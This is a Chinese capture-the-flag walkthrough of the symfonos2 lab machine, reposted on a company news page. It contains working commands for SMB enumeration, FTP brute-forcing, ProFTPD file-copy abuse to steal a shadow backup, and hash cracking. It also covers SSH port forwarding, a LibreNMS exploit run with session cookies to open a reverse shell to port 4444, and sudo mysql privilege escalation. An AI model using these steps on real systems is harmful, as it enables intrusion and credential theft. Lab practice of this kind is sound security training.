尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

从hash碰撞到ssh端口转发渗透内网:靶机练习之symfonos2

从hash碰撞到ssh端口转发渗透内网:靶机练习之symfonos2
📅 发布时间:2026/7/24 6:07:29

信息搜集

nmap -sn 192.168.8.0/24

nmap -sT --min-rate 10000 192.168.8.7 -p

重点关注445和21端口,一个smb一个ftp,这两个都是有关存储的

nmap -sT -sC -sV -O 192.168.8.7 -p21,22,80,139,445 -oA ports

smb渗透

enum4linux 192.168.8.7 -e US

有个匿名登录

smbclient //192.168.8.7/anonymous

有一个日志文件

mget logs.txt

泄露文件分析

存储了一个shadow.bak密码文件到备份文件夹

泄露了一个ftp用户名

ftp渗透

之前端口扫描的时候探测到了,ftp的版本

ftp爆破

之前文件泄露中拿到了一个文件名,尝试进行爆破,这个等待时间较长

hydra -l aeolus -P /usr/share/wordlists/rockyou.txt -f ftp://192.168.8.7

ps:第一次打的时候爆破出来了,第二次耗了两个小时才出来,这个应该不是常规路径,不推荐

未授权文件复制漏洞利用

有历史漏洞,但是目录没有写入权限,没有办法直接反弹shell

尝试文件复制,把shadow.bak文件复制到smb共享文件夹中


ftp> site cpfr /var/backups/shadow.bak 350 File or directory exists, ready for destination name ftp> site cpto /home/aeolus/share/shadow.bak 250 Copy successful

下载shadow文件

hash碰撞

john pass.hash --wordlist=/usr/share/wordlists/rockyou.txt

拿到第一个凭证

aeolus$sergioteamo

内网渗透

ss -ntlp

发现内网还有一个8080端口服务

ssh内网端口转发

ssh -L 8080:127.0.0.1:8080 aeolus@192.168.8.7 -N -L 参数详解 格式:-L [本地地址:]本地端口:目标地址:目标端口 -L 8080:127.0.0.1:8080 ↑ ↑ ↑ 本地端口 目标地址 目标端口 - 8080(本地端口)— 你本机监听 8080 端口 - 127.0.0.1(目标地址)— 这是相对于远程主机的地址,即远程主机的 localhost - 8080(目标端口)— 远程主机上 127.0.0.1:8080 的服务端口 数据流向 你的电脑:8080 ──SSH加密隧道──> 192.168.8.7 ──> 192.168.8.7:8080 (本机服务) 当你访问 http://127.0.0.1:8080 时,流量会被 SSH 加密后转发到 192.168.8.7,然后由远程主机访问它自己的 127.0.0.1:8080。 典型使用场景 远程主机 192.168.8.7 上运行了一个只监听 localhost 的服务(如 Web 管理面板、数据库、API 服务),这个服务不对外网暴露。通过这条命令,你可以安全地在你本地直接访问该服务,就像它在本地运行一样。 -N 的作用 不加 -N 的话,SSH 连接后会给你一个远程 shell。加上 -N 表示"不执行远程命令",连接建立后终端会挂起,只维持隧道,不打开 shell。适合单纯做端口转发时使用。

发现是一个librenms服务

librenms渗透

尝试用刚才获取的凭证,成功登录后台

查找漏洞利用

searchsploit librenms

查看利用方式,发现需要登录的cookie

burp登录抓包,拿到cookie

python2 47044.py http://127.0.0.1:8080/ "PHPSESSID=sr2acfp9qithdfben944bgrmh6; XSRF-TOKEN=eyJpdiI6ImZJWUtCRjB2Q3AwM1UzNWJPTWJjbnc9PSIsInZhbHVlIjoiVzRzOHkzZ1wvUDNMcWticUl1REdGMDUxTmVqRTlGT2U0cCtFT1JZTTNkMFh5T0V5NWtOQTRyR291TkI5K1NXVDB1Ukoyb0pDQVUrZG1MQnBKaStcLzlkZz09IiwibWFjIjoiOTEzODY1ZTJlMjRhZGE0ODIzZWYwM2Y4YjE2MDNjMWU1MTMxNTBjNDFkMTE5NWRjOTVjM2QxNTVmMTMzMTg4ZiJ9; librenms_session=eyJpdiI6IjF0OVZPSUtsOU5pSnNMMEl5eld2RWc9PSIsInZhbHVlIjoiOWoxSFM2cmV4Mm13S0pXRzd1RG55T1duc2srNEk0VGtrUDRqNlFKZmtyWVpLRlQ1Zk0zS2hlXC85RWNpd1wva0RVRThZdVJiazFZWTltRmpFeTdkeGJLUT09IiwibWFjIjoiZjM5ZTk5ZTQyOGRhNDEwNWZiNGYyMTc0ZjQyMjc3NmRkOTk0MGY1YmMyYzc2MDExMWEwN2U3ZmQxNWQ4YzM5YiJ9" 192.168.8.11 4444

启动msf

配置参数

成功拿到shell

sudo提权

sudo -l

可以免密执行sudo权限的mysql

GTFOBINs提权

成功提权

补充一个兔子洞

内网还有一个邮件服务,exim 4.89

有一个本地提权漏洞,似乎无法成功利用

小结一下

靶机整理难度不高,主要是针对smb泄露文件,展开两条思路进一步攻击;一个是用户名aeolus去爆破;一个是shadow备份文件和共享文件路径泄露,通过proftpd文件复制漏洞,拿到shadow备份文件,进行hash碰撞;后面的内网渗透,ssh端口转发,思路都非常流畅,是一台很好的练手的靶机

相关新闻

  • 优秀项目经理的22件大事与4项核心能力:贯穿施工全流程的管理之道
  • C++异常处理:从原理到实践,掌握健壮代码的关键
  • AI元人文:欲望、客观性与自我感知的三维纠缠治理

最新新闻

  • Google三款Flash模型实战指南:从环境配置到生产部署
  • sqli作业
  • 2026年7月宁波江诗丹顿回收哪家好?客服实测排行,避坑指南+平台对比! - 嘉价奢侈品回收平台
  • 深入解析TPS65810/11 PMIC:电源管理芯片架构、设计与调试实战
  • 86.2TB高清卫星影像更新北美洲区域(WGS84坐标投影)
  • C++ Seqlock实现:无锁读写同步的高性能并发编程

日新闻

  • 武汉卡地亚LOVE钻戒与钻石项链回收变现攻略|多家门店行情参考 - 大牌深度测评
  • 2026年无锡地区健康管理如何考量?四家机构业务体系概览
  • 2026图片去水印软件哪个好用 手机电脑免费工具盘点 - 免费软件工具方法教程

周新闻

  • SaaS软件行业GEO实践:AI搜索时代的品牌可见性与获客新路径
  • 什么是PCTFE?医药高端包装的“防潮王牌“材料
  • 【JVM调优实战】16-可视化利器-JConsole-VisualVM-JMC

月新闻

  • 2026年6月公司网站搭建最新热门渠道测评:四大低成本/零代码平台对比+避坑
  • 【Linux】Linux arm 编译QT程序,出现expected “}“报错
  • 【MATLAB例程】四基站二维AOA定位与距离辅助增强对比仿真。基于角度观测和测距修正的固定目标平面定位精度分析

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号